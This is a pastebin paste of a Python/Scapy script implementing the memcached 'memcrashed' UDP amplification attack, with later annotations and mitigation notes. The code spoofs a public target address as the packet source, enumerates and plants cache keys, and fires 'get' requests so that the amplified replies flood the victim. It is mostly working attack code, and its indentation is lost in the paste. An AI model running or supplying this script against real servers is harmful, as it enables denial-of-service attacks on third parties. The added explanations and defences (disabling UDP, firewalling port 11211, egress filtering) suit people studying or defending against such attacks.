
mem

a guest
Apr 24th, 2018
  86. # This program is distributed in the hope that it will be useful,
  87. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  88. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  89. # GNU General Public License for more details.
  90.  
  91. # You should have received a copy of the GNU General Public License
  92. # along with this program. If not, see <http://www.gnu.org/licenses/>.
  93. #
  94. # This was created to better understand the memcrashed exploit
  95. # brought to light thanks to CloudFlare.
  96. # (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
  97. # Please sysadmin responsibly.
  98.  
  99. # Packets stay blasting. Summary: for each host in SERVER_LIST the script sends memcached UDP requests whose IP source field is TARGET, so the servers' replies are delivered to TARGET rather than to the sender (the reflection/amplification pattern described in the Cloudflare write-up). NOTE(review): indentation was lost in this paste, so the nesting of the statements below cannot be confirmed from the page.
  100.  
  101. import requests
  102. import memcache
  103. import re
  104.  
  105. from scapy.all import *
  106.  
  107. # Vulnerable memcached server list ('host:port' entries; the part after ':' is split off below and port 11211 is used). 172.17.0.2 is a private address, presumably a local lab container - confirm.
  108. SERVER_LIST = [
  109. '172.17.0.2:11211',
  110. ]
  111.  
  112. # Destination of the replies: this address is placed in the IP source field of every request (src=TARGET below); it is not the destination of the packets the script sends
  113. TARGET = '130.211.45.45'
  114.  
  115. # optional payload to set if no keys exist; it is fetched over HTTPS when the script starts, before any packet is built
  116. payload = requests.get('https://google.com').text
  117. payload_key = 'fuckit'
  118.  
  119. # Only checks whether the fetched body is empty and prints a notice (Python 2 print statement); nothing here changes how the payload is held in memory, and the script continues either way
  120. if not payload:
  121. print 'Could not import payload, continuing anyway'
  122.  
  123. try:
  124. for server in SERVER_LIST:
  125. if ':' in server:
  126. server = server.split(':')[0]
  127.  
  128. ip = IP(src=TARGET, dst=server)
  129. packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n' # 8-byte memcached UDP frame header, then the ASCII command and CRLF
  130.  
  131. # fetch known keys by id: 'stats items' is sent over UDP and the id is taken as the second ':'-separated field of every reply line containing 'age'
  132. statitems_packet = packet_base.format('stats items')
  133. udp = UDP(sport=50000, dport=11211)/statitems_packet # fixed source port 50000, so replies leave the server from port 11211 addressed to TARGET port 50000 - the pattern a defender sees at the receiving end
  134. keyids = []
  135. resp = sr1(ip/udp)
  136. for key in str(resp.payload).split('\r\n'):
  137. # Lines without 'age' are ignored; per the author this is how the first line (which has hex in it) gets skipped
  138. if 'age' in key:
  139. key = key.split(':')[1]
  140. keyids.append(key)
  141.  
  142. # fetch names for keys by id: 'stats cachedump <id> 100' is sent for each collected id and key names are parsed from reply lines containing 'ITEM'
  143. keys = []
  144. for kid in keyids:
  145. query = 'stats cachedump {0} 100'.format(kid)
  146. keyid_packet = packet_base.format(query)
  147. udp = UDP(sport=50000, dport=11211)/keyid_packet
  148. resp = str(sr1(ip/udp).payload).split('\r\n')
  149. for key in resp:
  150. if 'ITEM' in key:
  151. res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
  152. keys.append(res.group('keyname'))
  153.  
  154. # if keys not present on target, make one: the fetched page is stored under payload_key through the memcache client so that a 'get' has something to return. Defensive note: this depends on the server accepting writes from the sender - keep port 11211 unreachable from untrusted networks.
  155. if not keys:
  156. mc = memcache.Client([server],debug=False)
  157. mc.set(payload_key, payload)
  158. keys.append(payload_key)
  159.  
  160. # iterate thru known keys and blast away: one 'get <key>' request per key, each with src=TARGET, so every stored value is sent to TARGET. Server-side mitigations: disable the UDP listener (memcached -U 0), bind to internal interfaces only (-l), firewall port 11211; network-side: filter spoofed source addresses at egress (BCP 38).
  161. for key in keys:
  162. query = 'get {0}'.format(key)
  163. fun_packet = packet_base.format(query)
  164. udp = UDP(sport=50000, dport=11211)/fun_packet
  165. sr1(ip/udp)
  166.  
  167. except Exception:
  168. raise # re-raises unchanged, so this try/except does not alter how errors propagate